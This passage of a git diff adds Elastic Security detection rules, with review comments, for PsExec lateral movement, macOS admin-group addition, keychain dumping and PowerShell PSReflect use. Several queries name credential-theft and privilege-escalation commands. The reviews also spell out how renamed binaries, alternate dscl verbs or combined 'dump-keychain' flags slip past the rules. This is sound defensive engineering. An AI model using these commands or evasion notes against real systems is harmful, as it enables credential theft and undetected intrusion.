"risk_score": 21, + "rule_id": "55d551c6-333b-4665-ab7e-5d14a59715ce", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + }, + { + "id": "T1570", + "name": "Lateral Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1570/" + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "55d551c6-333b-4665-ab7e-5d14a59715ce_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_3.json b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_3.json new file mode 100644 index 00000000000..39fcf3dae97 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_3.json 
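Review bot: Both stages of the sequence match only `process.name : "PsExec.exe"`, so the 64-bit binary that ships in the same Sysinternals suite (`PsExec64.exe`) is not covered, and the note already concedes that a renamed copy escapes the rule. Widening to `process.name : ("PsExec.exe", "PsExec64.exe")` in both the process and network stages is a cheap improvement; if the Elastic Defend data populates `process.pe.original_file_name`, matching on that would survive renames too, but confirm the field exists in the indexed events before relying on it. The `process.args : "-accepteula"` gate also means the rule only fires when the flag is supplied, which the inline comment itself frames as a first-run heuristic, so repeat use on a host that has already accepted the EULA is silently missed — worth stating in `false_positives` or the note so analysts do not read a lack of alerts as absence of PsExec.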
@@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_host", + "name": "Unusual Process Spawned by a Host", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "56004189-4e69-4a39-b4a9-195329d226e9", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "56004189-4e69-4a39-b4a9-195329d226e9_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_4.json b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_4.json new file mode 100644 index 00000000000..66d9f442153 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_4.json 
@@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_host", + "name": "Unusual Process Spawned by a Host", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "56004189-4e69-4a39-b4a9-195329d226e9", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. 
Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: If the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and check whether any ProblemChild predictions have been generated.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "56004189-4e69-4a39-b4a9-195329d226e9_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_104.json b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_104.json new file mode 100644 index 00000000000..f30ab618f17 
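Review bot: The setup text tells the reader to attach "the ingest pipeline named `-problem_child_ingest_pipeline`", but a name beginning with a bare hyphen looks like a version or package prefix was lost when the text was templated, and a user who copies it verbatim into `winlogbeat.yml` will get a pipeline-not-found error at ingest time. Confirm the actual pipeline id installed by the LotL package and either spell it out in full or replace the sentence with an instruction to look it up under `Stack Management > Ingest Pipelines` (filtering on `problem_child`). Separately, the `tags` array carries both `"Rule Type: ML"` and `"Rule Type: Machine Learning"`; if one is a legacy alias it should be noted, otherwise drop one to keep tag-based filtering consistent across the package.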
--- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_104.json 
@@ -0,0 +1,79 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.", + "index": [ + "winlogbeat-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601 - CurveBall)", + "query": "event.provider:\"Microsoft-Windows-Audit-CVE\" and message:\"[CVE-2020-0601]\" and host.os.type:windows\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + } + ], + "risk_score": 21, + "rule_id": "56557cde-d923-4b88-adee-c61b3f3b5dc3", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Use Case: Vulnerability" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.002", + "name": "Code Signing", + "reference": "https://attack.mitre.org/techniques/T1553/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 104 + }, + "id": "56557cde-d923-4b88-adee-c61b3f3b5dc3_104", + "type": "security-rule" +} \ No newline at end of file 
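Review bot: The `index` list includes `logs-system.security*` but `related_integrations` declares only the `windows` package, whereas the rule earlier in this diff that reads `logs-system.*` also lists `{"package": "system", "version": "^1.6.4"}`; add the same entry here so the Kibana setup view advertises the integration that actually feeds the rule. The Microsoft-Windows-Audit-CVE provider only emits this event on hosts that have the CVE-2020-0601 fix installed, so a host with zero alerts may simply be unpatched — a `setup` or `note` section stating that caveat would save analysts from a false sense of coverage. Given that the event is a positive detection of a spoofed certificate by the patched validator, `risk_score` 21 / `severity` low also seems under-weighted relative to the signal's fidelity; worth revisiting or at least justifying in the note.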
diff --git a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_106.json b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_106.json new file mode 100644 index 00000000000..f81ddf82c84 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_106.json 
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to add an account to the admin group via the command line. This could be an indication of privilege escalation activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Admin Group Account Addition", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:(dscl or dseditgroup) and process.args:((\"/Groups/admin\" or admin) and (\"-a\" or \"-append\"))\n", + "references": [ + "https://managingosx.wordpress.com/2010/01/14/add-a-user-to-the-admin-group-via-command-line-3-0/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "565c2b44-7a21-4818-955f-8d4737967d2e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "565c2b44-7a21-4818-955f-8d4737967d2e_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_107.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_107.json new file mode 100644 index 00000000000..a283ab14ca2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_107.json 
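Review bot: The query requires an argument of `"-a"` or `"-append"`, but `dscl` accepts its verbs with or without the leading dash (`dscl . append /Groups/admin GroupMembership user`) and also adds members via `-merge`/`merge`, so a bare `append` or a `merge` invocation adds an admin without triggering the rule; confirm against the `dscl` man page, then widen to `process.args:(("/Groups/admin" or admin) and ("-a" or "-append" or append or "-merge" or merge))`. The fully qualified node path `/Local/Default/Groups/admin` is likewise not matched by the literal `"/Groups/admin"` term. The MITRE mapping to T1078.003 (Valid Accounts) also reads oddly for a group-membership change; T1098 (Account Manipulation) is the closer technique and the one the description's wording implies.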
@@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may dump the content of the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Dumping of Keychain Content via Security Command", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.args : \"dump-keychain\" and process.args : \"-d\"\n", + "references": [ + "https://ss64.com/osx/security.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.001", + "name": "Keychain", + "reference": "https://attack.mitre.org/techniques/T1555/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "565d6ca5-75ba-4c82-9b13-add25353471c_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_110.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_110.json new file mode 100644 index 00000000000..2adcb781257 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_110.json 
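Review bot: The query matches `process.args : "-d"` as a standalone token, so combining flags getopt-style (`security dump-keychain -da`, `-rd`) yields a single argument that never equals `"-d"` and the dump of secret data goes unalerted; assuming `security` accepts combined short options as its man page indicates, a pattern such as `process.args : "-*d*"` (or an EQL `regex~` over `-[a-z]*d[a-z]*`) closes that gap at the cost of matching any dash-option containing a `d`, which is acceptable since the clause is already gated on `"dump-keychain"`. The rule ships at `severity` high with no `false_positives` or `note` section; a one-line `false_positives` entry noting that keychain backup or migration tooling may legitimately run `dump-keychain -d` would help analysts triage, and the note should remind them that on current macOS each item dump is user-prompted, so a successful dump implies interactive consent or a compromised session.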
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of PSReflect in PowerShell scripts. Attackers leverage PSReflect as a library that enables PowerShell to access win32 API functions.", + "false_positives": [ + "Legitimate PowerShell scripts that make use of PSReflect to access the win32 API" + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell PSReflect Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. 
The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network 
